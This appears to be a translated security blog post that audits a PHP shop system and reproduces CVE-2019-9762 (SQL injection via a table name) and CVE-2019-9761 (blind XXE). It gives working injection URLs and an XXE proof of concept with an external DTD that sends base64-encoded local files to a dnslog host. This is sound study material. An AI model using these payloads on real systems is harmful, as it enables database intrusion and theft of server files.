I studied the bypass of XSS a few days ago, and I am going to study the audit of SQL injection in depth in the past two days.
First, perform an automatic audit
Saw a suspected variable coverage point
Click in to see that it turns out that the hidden danger of register_globals has been eliminated.
Simply put, if this configuration is set to On, any parameter value transmitted from the client will be registered as a global variable, which will lead to the risk of variable overwriting, which will lead to the occurrence of various vulnerabilities, such as omnipotent unauthorized or unauthorized access.
If open is detected, the variable is destroyed
I followed the idea of automatic auditing and found several recommendation points, but none of them were available... When time is short, I will audit again.
Next, we will reproduce the two vulnerabilities exposed in this version.
1. CVE-2019-9762 (sql injection)
(1) Cause of vulnerability
The vulnerability is in line 35 of include\plugin\payment\alipay\pay.php
The above function accepts a parameter, but it is not the original parameter
Pay attention to the common file above
Come to common
It was found that the GPC ($_GET, $_POST, $_COOKIES) variables had been rewritten, various prefixes were added, and escape symbols were added before special characters\
The first function pe_dbhold is for safe processing of passed parameters.
This function uses recursion to determine whether more HTML entity encoding is required by passing parameters in $exc, and all special symbols are escaped before them.
The order_table function in the middle determines that this SQL injection is a bit special.
It will first determine whether the incoming parameter contains "_". If so, all the values before "_" will be spliced to order_
Otherwise, return to order directly
Come to the core query statement pe_select
To put it simply, here is splicing conditional statements
The key point is below. The spliced table name uses backticks, but no security measures are taken for the backticks in the passed parameter values.
So there is injection here in the table name
(2) Vulnerability exploitation
Since the code will splice the value before the first '_' in the parameter value into the table name, this means that the POC requires some special processing.
That is, you need to add "_" in the poc comment part to complete the table name splicing and code escape.
The number of fields found by order by is 12
Echo point lower right corner
Find the specific echo point:
/include/plugin/payment/alipay/pay.php?id=pay`%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12%20order%20by%201--%20_
After that, you can check the database name and other information, but you cannot use data with "_" for the reason mentioned above.
But you can blast the table name
like:
/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20and%20exists%20(select*%20from%20***)%23_
2.CVE-2019-9761(XXE)
1. Basic knowledge
1. First, let’s explain XML
XML is designed to transmit and store data. The general structure mainly includes the DTD part and the document (body) part.
DTD is used to declare XML documents, which can be declared in XML documents and referenced externally.
(1) If it is declared internally, there is a format
<!DOCTYPE 根元素 [元素声明]>
For example
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>
Comparing the top and bottom, DTD respectively defines the type of XML document (note, DOCTYPE), document elements (four, ELEMENT), and element type (ELEMENT).
(2) Referenced by XML source file
<!DOCTYPE 根元素 SYSTEM "文件名">
The dtd file is as follows
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
External citation:
<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>
2. DTD entity (ENTITY)
(1) Internal entity:
<!ENTITY 实体名称 "实体的值">
DTD example:
<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">
XML example:
<author>&writer;©right;</author>
(2) External entities
<!ENTITY 实体名称 SYSTEM "URI/URL">
dtd file:
<!ENTITY writer SYSTEM "http://*******/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://********/dtd/entities.dtd">
XML example:
<author>&writer;©right;</author>
There are also two styles, general entities and parameter entities.
General entities:
<!ENTITY 实体名称 SYSTEM "实体内容">
Quote:
&实体名称;
For example:
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<abc>&test;</abc>
Parameter entity:
<!ENTITY % 实体名称 SYSTEM "实体内容">
Quote:
%实体名称;
For example:
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=c:/test/1.txt">
<!ENTITY % dtd SYSTEM "http://localhost/evil.xml">
%dtd;
%send;
]>
<a></a>
3.About loopholes
One of the most important points of XXE is whether external entities can be referenced
In php, if libxml>2.9.0, it is enabled by default
libxml_disable_entity_loader(true);
That is to say, external entities are not parsed by default, that is, there is no XXE vulnerability (the following vulnerability environment can parse external entities)
2. Causes of vulnerabilities
Navigate to \include\plugin\payment\wechat\notify_url.php
Then locate wechat_getxml() and find that pe_getxml is returned directly
Continue positioning
Found $xml to get the original post data (php://input)
Then use the simplexml_load_string() function to parse the xml data without disabling xml references to external entities.
3. Exploiting vulnerabilities
Construct POC and a dtd file for reference (place it on an accessible public network server)
Since there is no echo here, the data can be bounced to the dnslog server.
dtd file:
<?xml version="1.0" encoding="utf-8"?>
<!ENTITY % all
"<!ENTITY send SYSTEM 'http://your.dnslog/?%file;'>"
>
%all;
poc:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/Windows/system.ini">
<!ENTITY % dtd SYSTEM "http://yourhost/1.dtd">
%dtd;
]>
<roottag>&send;</roottag>
The above xml source references the external dtd file (local test here) (note that the xml version and encoding statement must be added, otherwise it cannot be rebounded)
Then use PHP pseudo-protocol to load sensitive file contents into dnslog url
The base64-encoded data will then be accessed on the dnslog platform.
When changing the PHP version to a higher level, libxml>2.9.0, an error will be reported
Indicates that the entity send is undefined, that is, the external entity is not parsed.